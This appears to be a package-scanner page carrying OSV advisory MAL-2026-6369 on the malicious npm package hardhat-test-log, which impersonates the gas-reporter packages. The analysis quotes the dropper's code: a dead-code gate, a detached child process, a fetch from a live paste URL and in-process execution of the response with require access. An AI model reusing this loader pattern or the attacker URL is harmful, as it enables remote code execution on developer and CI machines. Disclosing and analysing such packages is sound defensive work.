OSV Malicious Advisory
scanned 4h ago · by OpenSSF/OSVOpenSSF/OSV advisory MAL-2026-6369 confirms this npm version as malicious. Package impersonates the well-known eth-gas-reporter / hardhat-gas-reporter packages: README is titled 'eth-test-log', copies badges and contributor metadata, and package.json sets author to 'cgewecke' (the real maintainer of those projects). The advertised Mocha reporter entrypoint is a decoy. index.js exports `log` as the reporter, but the function contains `var opt = 1; if (!opt) {...legitimate reporter code... }...
Advisory
MAL-2026-6369
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in hardhat-test-log (npm)
Details
Package impersonates the well-known eth-gas-reporter / hardhat-gas-reporter packages: README is titled 'eth-test-log', copies badges and contributor metadata, and package.json sets author to 'cgewecke' (the real maintainer of those projects). The advertised Mocha reporter entrypoint is a decoy. index.js exports `log` as the reporter, but the function contains `var opt = 1; if (!opt) {...legitimate reporter code... } else { gestest(); }` — the dead-code gate guarantees the else branch always runs, calling utils.connectNet. utils.connectNet (lib/utils.js) spawns `node lib/syncResolve.js` as a detached, unref'd child with stdio ignored, so the dropper persists beyond Mocha teardown and produces no CI output. lib/syncResolve.js then performs `axios.get('https://www.jsonkeeper.com/b/KBZVB', { headers: { 'x-secret-key':... } })`, extracts the `Cookie` field from the response, and executes it in-process via `new Function.constructor('require', result)(require)` — giving attacker-controlled code full Node `require` access. The fetch destination is a public paste-style host with mutable, opaque content and no integrity check, so the operator can rotate the payload at will. Installing/using this package as a Hardhat/Mocha gas reporter triggers remote code execution on the developer's or CI machine.
Decision reason
One or more suspicious static signals were detected.
References
Decision evidence
public snapshotBehavioral surface
ChildProcessDynamicRequireEnvironmentVarsFilesystemNetwork
UrlStrings
Source & flagged code
2 flagged · loading sourcecodechecks.jsView file
1const { join } = require("path");
L2: const fs = require("fs");
Medium
Dynamic Require
Package source references dynamic require/import behavior.
codechecks.jsView on unpkg · L1mock/scripts/integration_tests.shView file
•path = mock/scripts/integration_tests.sh
kind = build_helper
sizeBytes = 2079
magicHex = [redacted]
Medium
Ships Build Helper
Package ships non-JavaScript build or shell helper files.
mock/scripts/integration_tests.shView on unpkgFindings
1 High4 Medium3 Low
HighEval
MediumDynamic Requirecodechecks.js
MediumNetwork
MediumEnvironment Vars
MediumShips Build Helpermock/scripts/integration_tests.sh
LowScripts Present
LowFilesystem
LowUrl Strings